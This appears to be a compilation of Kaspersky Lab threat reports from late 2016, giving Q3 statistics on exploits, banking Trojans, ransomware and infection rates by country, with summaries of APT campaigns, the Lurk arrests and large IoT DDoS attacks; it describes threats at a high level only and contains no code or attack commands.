Distribution of exploits used in attacks by the type of application attacked, Q3 2016

Exploits for different browsers and their components (45%) once again topped the rating, although their share decreased by 3 percentage points. They are followed by exploits for Android OS vulnerabilities (19%), whose share fell 5 p.p. in the third quarter. Exploits kits for Microsoft Office rounded off the top three. Their contribution actually saw an increase from 14% to 16% in Q3.

Exploits for Adobe Flash Player remained popular. In fact, their share more than doubled from 6% to 13%. This was caused by the aforementioned RIG exploit kit: its use in several campaigns saw the share of SWF exploits increase dramatically.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

In the third quarter of 2016, Kaspersky Lab’s web antivirus detected 12,657,673 unique malicious objects (scripts, exploits, executable files, etc.) and 45,169,524 unique URLs were recognized as malicious by web antivirus components. Kaspersky Lab solutions detected and repelled 171,802,109 malicious attacks from online resources located in 190 countries all over the world.

Online threats in the banking sector

These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 1,198,264 computers in Q3 2016. The number of users attacked by financial malware increased by 5.8% from the previous quarter (1,132,031).

The third quarter is traditionally holiday season for many users of online banking services in Europe, which means the number of online payments made by these users increases during this period. This inevitably sees an increase in financial risks.

Number of users attacked by financial malware, Q3 2016

In Q3, the activity of financial threats grew month on month.

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

Geography of banking malware attacks in Q3 2016 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users** 1 Russia 4.20 2 Sri Lanka 3.48 3 Brazil 2.86 4 Turkey 2.77 5 Cambodia 2.59 6 Ukraine 1.90 7 Venezuela 1.90 8 Vietnam 1.86 9 Argentina 1.86 10 Uzbekistan 1.77

These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the third quarter of 2016, Russia had the highest proportion of users attacked by banking Trojans. Representatives of the Trojan-Banker ZeuS (Zbot) family, which leads the way in terms of the number of attacked users worldwide, were especially active in Russia. This is unsurprising since Russian cybercriminals are allegedly behind the development of this malware. They know the specifics of Russia’s online banking systems as well as the mentality of Russian users and take them into consideration when developing their malware. In Russia, the Gozi banking Trojan continues to proliferate. It displayed a burst of activity in the previous quarter after its developers joined forces with the creators of the Nymaim Trojan. Russia also topped the TOP 10 countries with the highest proportion of users attacked by mobile bankers.

Sri Lanka, a favorite destination with tourists, was a newcomer to the rating, going straight in at second. Financial threats were encountered by 3.48% of users in the country. Among them are likely to be foreigners who arrived in the country on holiday and used online banking services to make payments. The most active representatives of banking malware in the region were those from the Fsysna banker family. This family has previously been noted for attacks targeting customers of Latin American banks.

In Q3 2016, @kaspersky #mobile security products detected 1.5m malicious installation packages #KLreport

Tweet

Brazil rounds off the top three for the second quarter in a row. In Q2, we forecast a surge of financial threat activity in Latin America and specifically in Brazil because of this summer’s Olympic Games. However, the increase in the proportion of users attacked in Brazil was negligible: in the third quarter, 2.86% of users in Brazil encountered financial threats compared to 2.63% in Q2. At the same time, users in Argentina were subjected to a surge in malicious attacks, and as a result, the country ranked ninth.

The holiday season affected almost all countries in the TOP 10. In Russia, Ukraine and Uzbekistan, people traditionally have vacations at this time of the year, while other countries (Sri Lanka, Brazil, Turkey, Cambodia, etc.) are considered popular tourist destinations. Tourists tend to be active users of online banking systems, which in turn attracts cybercriminals and their banking malware.

The share of banking Trojan victims in Italy was 0.60%, in Spain it was 0.61%, while in Germany and the UAE the figures were 1.21% and 1.14% respectively.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

Name* % of attacked users** 1 Trojan-Spy.Win32.Zbot 34.58 2 Trojan.Win32.Qhost/Trojan.BAT.Qhost 9.48 3 Trojan.Win32.Fsysna 9.467 4 Trojan-Banker.Win32.Gozi 8.98 5 Trojan.Win32.Nymaim 8.32 6 Trojan-Banker.Win32.Shiotob 5.29 7 Trojan-Banker.Win32.ChePro 3.77 8 Trojan-Banker.Win32.BestaFera 3.31 9 Trojan-Banker.Win32.Banbra 2.79 10 Trojan.Win32.Neurevt 1.79

* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

The undisputed leader of the rating is Trojan-Spy.Win32.Zbot. Its source codes have been publicly available since a leak and are now widely exploited as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating – cybercriminals regularly enhance the family with new modifications compiled on the basis of the source code and containing minor differences from the original.

The family of Qhost Trojans (verdicts Trojan.Win32.Qhost and Trojan.BAT.Qhost) came second. The functionality of this family’s malicious programs is relatively simple: the Trojan modifies the content of the Host file (a special text file that contains a database of domain names that are used when transmitting to the network addresses of nodes) and as soon as specific resources are visited, the Trojan’s malicious components are loaded to an infected workstation and used to steal payment information. The Trojan adds a number of records to the Host file preventing the user’s browser from connecting to web-based apps and resources of popular antivirus vendors.

The Q3 rating also includes a new malware representative that has already demonstrated its capabilities in Sri Lanka – the Trojan.Win32.Fsysna family of banking Trojans. Members of this family, in addition to stealing payment data from infected workstations, are also used by cybercriminals to distribute spam. The Trojan uses an infected machine to redirect spam messages from the command center to a mail server. Some representatives of this family also possess Trojan cryptor functionality. Fsysna is kind of a ‘Swiss army knife’ used by cybercriminals to steal money.

Q3 2016 saw a decline in the activity of the notorious financial threat Trojan-Spy.Win32.Lurk: the number of users attacked by this malware fell by 7.1%. Lurk was not included in the TOP 10 banking malware families, but it still poses a threat to users of online banking systems. The cybercriminal group behind this financial threat has been arrested (something we wrote about in a separate article), so we expect to see a further decrease in activity by this banking Trojan next quarter.

Ransomware Trojans

Cryptors are currently one of the biggest threats to users and companies. These malicious programs are becoming more and more popular in the cybercriminal world because they are capable of generating large profits for their owners.

A total of 21 new cryptor families and 32,091 new modifications were detected in Q3. We also added several existing cryptor families to our virus collection.

The number of new cryptor families added to our virus collection is slightly less than in the second quarter (25), but the number of newly created modifications increased 3.5 times compared to the previous quarter.

The number of newly created cryptor modifications, Q1 – Q3 2016

Malware writers are constantly trying to improve their creations. New ways to infect computers are always being sought, especially for attacks on companies, which cybercriminals see as far more profitable than attacks on standard users.

Remote launching of cryptors by cybercriminals

We are increasingly seeing incidents where cybercriminals crack passwords to gain remote access to a victim’s system (usually an organization) and infect a compromised machine with Trojan ransomware. Examples of this in Q3 were Dcryptor and Xpan.

Dcryptor/Mamba

Trojan-Ransom.Win32.Dcryptor is known on the Internet under the pseudonym ‘Mamba’. Infection is carried out manually. The fraudsters brute-force the passwords for remote access to the victim machine and run the Trojan, passing on the password for encryption as a command line argument.

During infection, the Trojan uses the legitimate DiskCryptor utility. As a result, it’s not just individual files on network drives that are infected but entire hard drive sectors on the local machine. System boot is blocked: once the computer is started, a message appears on the screen demanding a ransom and displaying an email address for communicating with the attackers.

This Trojan reminds us of the notorious Petya/Mischa Trojan and continues the growing trend of cybercriminals looking for new ways to block access to data.

Xpan/TeamXRat ransomware

Trojan-Ransom.Win32.Xpan is yet another example of ransomware that is launched after attackers remotely penetrate a system. This Trojan is distributed by Brazilian cybercriminals. They brute-force the RDP password (the standard protocol for remote access to Windows computers) and infect the compromised system using the Xpan Trojan that encrypts files and displays a ransom demand.

Ransomware in scripting languages

Another trend that has attracted our attention is the growing number of cryptors written in scripting languages. In the third quarter of 2016, we came across several new families written in Python:

  • HolyCrypt (Trojan-Ransom.Python.Holy)
  • CryPy (Trojan-Ransom.Python.Kpyna)
  • Trojan-Ransom.Python.Agent

Another example that emerged in June was Stampado (Trojan-Ransom.Win32.Stampa) written in AutoIt, the automation language.

The number of users attacked by ransomware

In Q3 2016, 821,865 unique KSN users were attacked by cryptors – that is 2.6 times more than the previous quarter.

Number of unique users attacked by Trojan-Ransom cryptor malware (Q3 2016)

The largest contribution was made by representatives of the Trojan-Downloader.JS.Cryptoload family. These Trojan downloaders, written in JavaScript, were designed to download and install representatives of different cryptor families in the system.

Geography of Trojan-Ransomattacks in Q3 2016 (percentage of attacked users)

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors** 1 Japan 4.83 2 Croatia 3.71 3 Korea 3.36 4 Tunisia 3.22 5 Bulgaria 3.20 6 Hong Kong 3.14 7 Taiwan 3.03 8 Argentina 2.65 9 Maldives 2.63 10 Australia 2.56

* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

As in the previous quarter, Japan topped this rating.

Newcomers to this Top 10 were Tunisia, Hong Kong, Argentina, and Australia, with Italy, Djibouti, Luxembourg, and the Netherlands all making way.

Top 10 most widespread cryptor families Name Verdict* % of attacked users** 1 CTB-Locker Trojan-Ransom.Win32.Onion/ Trojan-Ransom.NSIS.Onion 28.34 2 Locky Trojan-Ransom.Win32.Locky 9.60 3 CryptXXX Trojan-Ransom.Win32.CryptXXX 8.95 4 TeslaCrypt Trojan-Ransom.Win32.Bitman 1.44 5 Shade Trojan-Ransom.Win32.Shade 1.10 6 Cryakl Trojan-Ransom.Win32.Cryakl 0.82 7 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 0.73 8 Cerber Trojan-Ransom.Win32.Zerber 0.59 9 CryptoWall Trojan-Ransom.Win32.Cryptodef 0.58 10 Crysis Trojan-Ransom.Win32.Crusis 0.51

* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

CTB-Locker once again occupied first place in the Q3. The top three also included the now infamous Locky and CryptXXX. Despite the fact that the owners of TeslaCrypt disabled their servers and posted a master key to decrypt files back in May 2016, it continues to make it into our rating (although its contribution dropped by 5.8 times in Q3)

Crysis

Crysis (verdict Trojan-Ransom.Win32.Crusis) was a newcomer to the TOP 10 in Q3. This Trojan was first detected in February 2016 and since then has undergone several code modifications.

Interestingly, the list of email addresses used for ransom demands by the distributors of Crysis partly matches the list associated with the Cryakl and Aura Trojans. Analysis of the executable files from these families, however, shows that they do not share the same code. It appears that these malicious programs are spread via a partner scheme, and because some distributors are distributing several different Trojans simultaneously they are using the same email address to communicate their ransom demands to the victims.

Polyglot/MarsJoke

This Trojan appeared in August 2016 (we recently published a detailed analysis of Polyglot/ MarsJoke). It is not included in the TOP 10, but it does have one interesting feature: the authors have tried to imitate the well-known CTB-Locker, which tops the rating for the second quarter in a row. Both the external and internal design of this piece of malware is very similar to the “original”, but the cybercriminals made a mistake that allows files to be decrypted without paying a ransom.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q3 2016, Kaspersky Lab solutions blocked 171,802,109 attacks launched from web resources located in 190 countries around the world. 45,169,524 unique URLs were recognized as malicious by web antivirus components.

83% of notifications about blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

Distribution of web attack sources by country, Q3 2016

The US (33.51%) remained top of this rating in Q3. Russia (9%) dropped from second to fourth, while Germany came second with a share of 10.5%. Canada left the Top 10, with Cyprus a newcomer in ninth place (1.24%).

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

In Q3 2016, 30,167 #mobile #banking Trojans were detected by @kaspersky mobile security products #KLreport

Tweet

Please note that starting this quarter, this rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked ** 1 Slovenia 30.02 2 Bulgaria 29.49 3 Armenia 29.30 4 Italy 29.21 5 Ukraine 28.18 6 Spain 28.15 7 Brazil 27.83 8 Belarus 27.06 9 Algeria 26.95 10 Qatar 26.42 11 Greece 26.10 12 Portugal 26.08 13 Russia 25.87 14 France 25.44 15 Kazakhstan 25.26 16 Azerbaijan 25.05 17 United Arab Emirates 24.97 18 Vietnam 24.73 19 China 24.19 20 Albania 23.23

These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.2% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

Geography of malicious web attacks in Q3 2016 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Croatia (14.21%), the UK (14.19%), Singapore (13.78%), the US (13.45%), Norway (13.07%), Czech Republic (12.80%), South Africa (11.98%), Sweden (10.96%), Korea (10.61%), the Netherlands (9.95%), Japan (9.78%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2016, Kaspersky Lab’s file antivirus detected 116,469,744 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

In Q3 2016, @kaspersky #mobile security products detected 37,150 mobile #ransomware Trojans #KLreport

Tweet

Please note that starting this quarter, the rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked** 1 Vietnam 52.07 2 Afghanistan 52.00 3 Yemen 51.32 4 Somalia 50.78 5 Ethiopia 50.50 6 Uzbekistan 50.15 7 Rwanda 50,14 8 Laos 49.27 9 Venezuela 49.27 10 Philippines 47.69 11 Nepal 47.01 12 Djibouti 46.49 13 Burundi 46,17 14 Syria 45.97 15 Bangladesh 45.48 16 Cambodia 44.51 17 Indonesia 43.31 18 Tajikistan 43,01 19 Mozambique 42.98 20 Myanmar 42.85

These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 22.9% of computers globally faced at least one Malware-class local threat during the third quarter.

The safest countries in terms of local infection risks were: Spain (14.68%), Singapore (13.86%), Italy (13.30%), Finland (10.94%), Norway (10.86%), France (10.81%), Australia ( 10.77%), Czech Republic (9.89%), Croatia (9.70%), Ireland (9.62%), Germany (9.16%), the UK (9.09%), Canada (8.92%), Sweden (8.32%), the USA (8.08%), Denmark (6.53%), and Japan (6.53%).

IT threat evolution Q3 2016

Thu, 11/03/2016 - 06:59

 Download the full report (PDF)

Overview Targeted attacks and malware campaigns Dropping Elephant

Targeted attack campaigns don’t need to be technically advanced in order to be successful. In July 2016 we reported on a group called Dropping Elephant (also known as ‘Chinastrats’ and ‘Patchwork’). Using a combination of social engineering, old exploit code and some PowerShell-based malware this group was able to steal sensitive data from its victims.

This group, which has been active since November 2015, targets high profile diplomatic and economic organizations linked to China’s foreign relations – an interest that is evident from the themes the attackers use to trap their victims.

The attackers use a combination of spear-phishing e-mails and watering-hole attacks. The first involves sending a document with remote content. When the victim opens the document, a ping request is sent to the attackers’ Command-and-Control (C2) server. The victim then receives a second spear-phishing e-mail, containing either a Word document or a PowerPoint file (these exploit old vulnerabilities – CVE-2012-0158 and CVE-2014-6352 respectively). Once the payload has been executed, a UPX-packed AutoIT executable is dropped on to the system: once executed, this downloads further components from the C2 server and the theft of data from the victim’s computer begins.

In Q3 2016, @kaspersky repelled 172m malicious attacks via online resources located in 191 countries #KLreport #Infosec

Tweet

The attackers also created a watering-hole website that downloads genuine news articles from legitimate websites. If a visitor wants to view the whole article, they are prompted to download a PowerPoint file: this reveals the rest of the document, but also asks the victim to download a malicious object. The attackers sometimes e-mail links to their watering-hole website. In addition, they maintain Google+, Facebook and Twitter accounts, to develop relevant search engine optimization (SEO) and to reach out to wider targets.

The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims – it’s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering.

ProjectSauron

In September, our Anti-Targeted Attack Platform flagged an anomaly in the network of a customer’s organization. Further investigation led us to uncover ProjectSauron, a group that has been stealing confidential data from organizations in Russia, Iran and Rwanda – and probably other countries – since June 2011. We have identified more than 30 victims: the target organizations all play a key role in providing state services and come from government, military, scientific research, telecommunications and financial sectors.

ProjectSauron is particularly focused on obtaining access to encrypted communications, hunting for them using an advanced, modular cyber-espionage platform that incorporates a set of unique tools and techniques. The cost, complexity, persistence and the ultimate goal of the operation (i.e. stealing secret data from state-related organizations) suggest that ProjectSauron is a state-sponsored campaign. ProjectSauron gives the impression of an experienced threat group that has made a considerable effort to learn from other highly advanced attacks, including Duqu, Flame, Equation and Regin – adopting some of their most innovative techniques and improving on their tactics in order to remain undiscovered.

One of the most noteworthy features of ProjectSauron is the deliberate avoidance of patterns: the implants used by the group are customized for each victim and are never re-used. This makes the use of traditional Indicators of Compromise (IoC) almost useless. This approach, along with the use of multiple routes for the exfiltration of stolen data (such as legitimate e-mail channels and DNS) enables ProjectSauron to conduct well-hidden, long-term spying campaigns in targeted networks.

Key features of ProjectSauron:

  • core implants that are unique for each victim;
  • use of legitimate software update scripts;
  • use of backdoors that download new modules or run commands in memory only;
  • focus on information relating to custom network encryption software;
  • use of low-level tools orchestrated by high-level LUA scripts (the use of LUA is very rare – previously seen only in Flame and Animal Farm attacks;
  • use of specially prepared USB drives to jump across air-gapped networks, with hidden compartments for storing stolen data;
  • use of multiple exfiltration mechanisms to conceal transfer of data in day-to-day traffic.

The method used to initially infect victims remains unknown.

The single use of unique methods, such as control server, encryption keys and more, in addition to the adoption of cutting-edge techniques from other major threats groups, is new. The only effective way to withstand such threats is to deploy multiple layers of security, with sensors to monitor for even the slightest anomaly in organizational workflow, combined with threat intelligence and forensic analysis. You can find further discussion of the methods available to deal with such threats here.

ShadowBrokers

In August, a person or group going under the name ‘ShadowBrokers’ claimed to possess files belonging to the Equation group. They provided links to two PGP encrypted archives. They provided the password to the first for free, but ‘auctioned’ the second, setting the price at 1 million BTC (1/15th of the bitcoins in circulation).

Having uncovered the Equation group in February 2015, we were interested in examining the first archive. It contains almost 300MB of firewall exploits, tools and scripts, under cryptonyms such as BANANAUSURPER, BLATSTING and BUZZDIRECTION. Most of the files are at least three years old, with change entries pointing to August 2013 and the newest time-stamp dating to October 2013.

The Equation group makes extensive use of RC5 and RC6 encryption algorithms (these algorithms were designed by Ronald Rivest in 1994 and 1998 respectively). The free trove provided by ShadowBrokers includes 347 different instances of RC5 and RC6 implementations. The implementation is functionally identical with that found in the Equation malware – and has not been seen elsewhere.

The code similarity makes us believe with a high degree of confidence that the tools from the ShadowBrokers leak are related to the malware from the Equation group.

Operation Ghoul

In June, we noticed a wave of spear-phishing e-mails with malicious attachments. The messages, sent mainly to top and middle level managers of numerous companies, appeared to be coming from a bank in the UAE. The messages claimed to offer payment advice from the bank and included an attached SWIFT document. But the archive really contained malware. Further investigation revealed that the June attacks were the most recent operation of a group that researchers had been tracking for more than a year, named Operation Ghoul by Kaspersky Lab.

The group successfully attacked more than 130 organizations from 30 countries, including Spain, Pakistan, UAE, India, Egypt, the United Kingdom, Germany and Saudi Arabia. Based on information obtained from the sink-hole of some C2 servers, the majority of the target organizations work in the industrial and engineering sectors. Others include shipping, pharmaceutical, manufacturing, trading and educational organizations.

The malware used by the Operation Ghoul group is based on the commercial spyware kit Hawkeye, sold openly on the Dark Web. Once installed, the malware collects interesting data from the victim’s computer, including keystrokes, clipboard data, FTP server credentials, account data from browsers, messaging clients, e-mail clients and information about installed applications. This data is sent to the group’s C2 servers.

The aim of the campaign seems to be financial profit – all the targeted organizations hold valuable data that can be sold on the black market.

The continued success of social engineering as a way of gaining a foothold in target organizations highlights the need for businesses to make staff awareness and education a central component of their security strategy.

Malware stories Lurk

In June 2016 we reported on the Lurk banking Trojan, used to systematically siphon money from the accounts of commercial organizations in Russia – among them, a number of banks. The police estimate the losses caused by this Trojan at around $45 million.

During our research into this Trojan, it became apparent that victims of Lurk had also installed the remote administration software, Ammyy Admin. While we didn’t give it much thought at first, it became apparent that the official Ammyy Admin website had been compromised and was being used by the Lurk gang as part of a watering-hole attack: the Trojan was downloaded to victim’s computers along with the legitimate software.

The dropper on the Ammyy Admin site started distributing a different Trojan on 1 June 2016, ‘Trojan-PSW.Win32.Fareit’: this was the day that the alleged creators of the Lurk Trojan were arrested. It seems that those responsible for the Ammyy Admin website breach were happy to sell their Trojan dropper to anyone who wanted to distribute malware from the compromised site.

The banking Trojan wasn’t the only cybercriminal activity the Lurk group was involved in. The group also developed the Angler exploit kit, a set of malicious programs designed to exploit vulnerabilities in widespread software to install malware. This exploit kit was originally developed to provide a reliable and effective delivery channel for the group’s malware. However, in 2013 the group started to rent out the kit to anyone who was willing to pay for it – probably to help pay for the group’s huge network infrastructure and large number of ‘staff’. The Angler exploit kit became one of the most powerful tools available on the criminal underground. Unlike the Lurk banking Trojan, which focused on victims in Russia, Angler has been used by attackers across the world – including the groups behind the CryptXXX and TeslaCrypt ransomware and the Neverquest banking Trojan (the latter was used against almost 100 banks). The operations of Angler were disrupted after the arrest of the alleged members of the Lurk group.

In Q3 2016, 45.2M unique malicious URLs were recognized by @kaspersky web antivirus components #KLreport #IT

Tweet

The group was involved in other side activities too. For more than five years, the group moved from developing very powerful malware for automated money theft with Remote Banking Services software, to sophisticated theft involving SIM-card swap fraud, to becoming hacking specialists familiar with the internal infrastructure of banks.

Kaspersky Lab provided assistance to the Russian police in the investigation into the group behind the Lurk Trojan. The arrests marked the culmination of a six-year investigation by our Computer Incidents Investigation Team. You can read about the investigation here.

Ransomware

Hardly a month goes by without reports of ransomware attacks in the media: for example, a recent report suggested that 28 NHS trusts in the UK have fallen victim to ransomware in the last 12 months. Most ransomware attacks are directed at consumers, but a significant proportion target businesses (around 13 per cent in 2015-16). The Kaspersky Lab IT Security Risks Survey 2016 indicated that around 42 per cent of small and medium businesses became victims of ransomware in the 12 months up to August 2016.

One recent ransomware campaign demanded a massive two bitcoins (around $1,300) as a ransom. The ransomware program, named Ded Cryptor, changes the wallpaper on the victim’s computer to a picture of an evil-looking Santa Claus.

The modus operandi of this program (i.e. encrypted files, scary image, and ransom demand) is unremarkable, but the pre-history of this attack is interesting. It is based on the EDA2 open-source ransomware code, developed by Utku Sen as part of a failed experiment. Utku Sen, a security expert from Turkey, created a ransomware program and published the code online. He realized that cybercriminals would use the code to create their own cryptors, but hoped that this would help security researchers to understand how cybercriminals think and code, thereby making their own efforts to block ransomware more effective.

Ded Cryptor was just one of many ransomware programs spawned by EDA2. Another such program that we saw recently was Fantom. This was interesting not just because of its connection to EDA2, but because it simulates a genuine-looking Windows update screen

This is displayed while Fantom is encrypting the victim’s files in the background. The fake update program runs in full-screen mode, visually blocking access to other programs and distracting the victim from what’s really happening. Once the encryption has been completed, Fantom displays a more typical message.

There’s no doubt that public awareness of the problem is growing, but it’s clear that consumers and organizations alike are not doing enough to combat the threat; and cybercriminals are capitalising on this – this is clearly reflected in the growing number of ransomware attacks.

It’s important to reduce your exposure to ransomware (and we’ve outlined important steps you can take here and here). However, there’s no such thing as 100 per cent security, so it’s also important to mitigate the risk. In particular, it’s vital to ensure that you have a backup, to avoid facing a situation where the only choices are to pay the cybercriminals or lose your data. It’s never advisable to pay the ransom.

In Q3 2016, @kaspersky web #antivirus detected 12,657,673 unique malicious objects #KLreport #netsec

Tweet

If you do find yourself in a situation where your files are encrypted and you don’t have a backup, ask your anti-malware vendor if they can help and check the No More Ransom website, to see if it holds the keys to decrypt your data. This is a joint initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky Lab and Intel Security – designed to help victims of ransomware retrieve their encrypted data without paying cybercriminals.

In a recent ‘ask the expert‘ session, Jornt van der Wiel, an expert from Kaspersky Lab’s Global Research and Analysis Team, provided useful insights into ransomware.

Data breaches

Personal information is a valuable commodity, so it’s no surprise that cybercriminals target online providers, looking for ways to bulk-steal data in a single attack. We’ve become accustomed to the steady stream of security breaches reported in the media. This quarter has been no exception, with data leaks from the official forum of DotA 2, Yahoo and others.

Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves. Any organization that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. As an alternative, people can use a password manager application to handle all this for them automatically.

It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

Given the potential impact of a security breach, it’s hardly surprising to see regulatory authorities paying closer attention to the issue. The UK Information Commissioner’s Office (ICO) recently issued a record fine of £400,000 to Talk Talk for the company’s ‘failure to implement the most basic cyber security measures’, related to the attack on the company in October 2015. In the view of the ICO, the record fine ‘acts as a warning to others that cyber security is not an IT issue, it is a boardroom issue’.

The EU General Data Protection Regulation (GDPR), which comes into force in May 2018, will require companies to notify the regulator of data breaches, with significant fines for failure to secure personal data. You can find an overview of the regulation here.

We took a look back at the impact of the Ashley Madison breach, one year after the attack that led to the leak of customer data, offering some good tips to anyone who might be considering looking online for love (and good advice for managing any online account).

Kaspersky DDOS intelligence report for Q3 2016

Mon, 10/31/2016 - 04:57

Q3 events Cybercrime as a Service

In the last few months the scale of the global ‘Cybercrime as a Service’ infrastructure has been revealed – fully commercialized, with DDoS as one of the most popular services capable of launching attacks the likes of which have never seen before in terms of volume and technological complexity.

Against this background, Europol published the 2016 Internet Organized Crime Threat Assessment (IOCTA) on 28 September, which is based on the experiences of law enforcement institutions within the EU member states. The report clearly ranks DDoS in first place as a key threat and that any “Internet facing entity, regardless of its purpose or business, must consider itself and its resources to be a target for cybercriminals”.

Most likely, this stems from early September when Brian Krebs, an industry security expert, published an investigation outlining the business operations of a major global DDoS botnet service called vDOS and its principal owners, two young men in Israel. The culprits have been arrested and investigations are ongoing, but the sheer scale of their business is stunning.

Based on a subscription scheme, starting from $19.99 per month, tens of thousands of customers paid more than $600,000 over the past two years to vDOS. In just four months between April and July, vDOS launched more than 277 million seconds of attack time, or approximately 8.81 years’ worth of attack traffic.

It was no wonder, that shortly afterwards a DDoS attack brought down Brian Krebs’s website with a traffic volume close to 620 Gbps, making it one of the biggest attacks the Internet has ever witnessed, only to be topped several days later by another attack close to 1 Tbps that hit France’s OVH. The attack vector, as Octava Klaba, CTO at OVH reported, looks like the same Internet of Things (IoT) botnet totaling 152,464 devices – mainly webcams, routers and thermostats – that brought down Brian Krebs’s website.

To make the situation even worse, hackers just released the Mirai source code, which, according to security experts, was responsible for the aforementioned DDoS attacks. The code includes a built-in scanner to look for vulnerable IoT devices and enrolls them into a botnet. With this, we expect to see a new wave of commercial services like vDOS and DDoS attacks in the coming months.

The Internet of Things is increasingly becoming a powerful tool for attackers, facilitated by the neglect for information security both on the part of vendors and users.

So, check that your devices connected to the Internet have a strong security setup.

‘Political’ DDoS attacks

DDoS is widely used in politics. In July of this year, an international tribunal stated China’s territorial claims to the Spratly archipelago in the South China Sea were groundless, and almost immediately at least 68 sites belonging to various Philippine government institutions were subjected to powerful DDoS attacks. The international press called these incidents part of a long-term cyberespionage campaign launched by China in its struggle for sovereignty of the Spratly archipelago.

Attack on a broker

Cybercriminals have identified the most vulnerable targets for DDoS extortion purposes – broker companies. They are high-turnover businesses that are also extremely dependent on web services. The Taiwanese company First Securities recently received a demand for 50 bitcoins (about $32,000) from unknown persons. After refusing to pay, the company’s website was targeted by a DDoS attack, which made bidding for the company’s clients impossible. Meanwhile, the president of First Securities released a statement to the press saying they had experienced a “trade slowdown” that only affected some of their investors.

Assessing the damage caused by DDoS attacks

B2B International, at the request of Kaspersky Lab, conducted the study called IT Security Risks 2016. According to the results, corporations are suffering increasing damage from DDoS attacks: a single attack can cost a company more than $1.6 billion in losses. At the same time, 8 out of 10 companies are subjected to several attacks per year.

Trend of the quarter: SSL-based DDoS attacks

According to Kaspersky DDoS Protection, the number of “smart” HTTPS-based DDoS attacks on applications increased in the third quarter of 2016. These attacks boast a number of important advantages that make a successful attack more likely.

